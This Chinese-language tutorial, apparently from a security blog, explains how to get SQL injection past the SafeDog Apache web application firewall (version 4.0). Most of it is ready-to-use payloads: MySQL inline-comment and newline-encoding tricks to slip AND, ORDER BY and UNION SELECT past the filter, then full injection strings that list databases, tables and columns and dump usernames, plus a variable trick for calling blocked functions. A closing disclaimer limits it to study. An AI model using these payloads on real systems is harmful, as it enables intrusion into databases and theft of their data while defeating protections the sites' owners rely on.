全方面绕过安全狗注入
字数 603 2025-08-25 22:58:41
绕过安全狗注入攻击技术详解
环境预览
- 使用最新版安全狗Apache版本4.0
- 测试环境包含基本的SQL注入漏洞点
基础绕过技术
绕过AND条件检测
- 常规
and 1=1会被拦截 - 替代方案:
and ord(0x1) == and True and ord(0x0) == and False
绕过ORDER BY检测
- 常规
order by会被拦截 - 绕过方法:在
order和by之间插入无效字符并换行order /*|--|*/--+%20%0Aby 3%23
绕过UNION SELECT检测
- 常规
union select 1,2,3会被拦截 - 使用MySQL内联注释+空语句+注释+换行:
/*!union*/ /*!*/ --+1%0Aselect 1,2,3 %23/*!...*/是MySQL特有语法,其他数据库会忽略/50001 /表示数据库版本>=5.00.01时执行
数据获取技术
查询数据库
/*!union*//*!*/--+1%0A%0ASELECT 1,2,concat(/*!schema_name*/) /*!from*/ information_schema.schemata--+*/%23
查询表
/*!union*//*!*/--+1%0A%0ASELECT 1,2,concat(/*!table_name*/) /*!from*/ information_schema.tables where table_schema=0x747261696E--+*/%23
查询字段
/*!union*//*!*/--+1%0A%0ASELECT 1,2,concat(/*!column_name*/) /*!from*/ information_schema.columns where table_name=0x7573657273--+*/%23
查询数据
/*!union*//*!*/--+1%0A%0ASELECT%201,2,concat(/*!username*/)%20/*!from*/%20users--+*/%23
系统函数绕过
- 使用变量处理绕过函数检测:
/*!union*//*!*/--+1%0ASELECT 1,@s:=database/**/(),1%23 /*!union*//*!*/--+1%0ASELECT 1,@s:=user/**/(),1%23
技术要点总结
-
注释技巧:充分利用MySQL特有的内联注释
/*!...*/和常规注释--、# -
空白字符处理:使用换行
%0A、空格%20等分隔关键词 -
编码技巧:使用十六进制编码(如
0x747261696E)代替字符串 -
变量赋值:通过
@s:=function()方式调用被拦截的函数 -
版本特性:利用MySQL版本特定语法绕过检测
注意事项
-
这些技术针对的是特定版本的安全狗(4.0),新版(如4.028330)可能已修复部分绕过方法
-
实际应用中需要根据目标环境调整绕过技术
-
所有技术仅供学习研究使用,切勿用于非法用途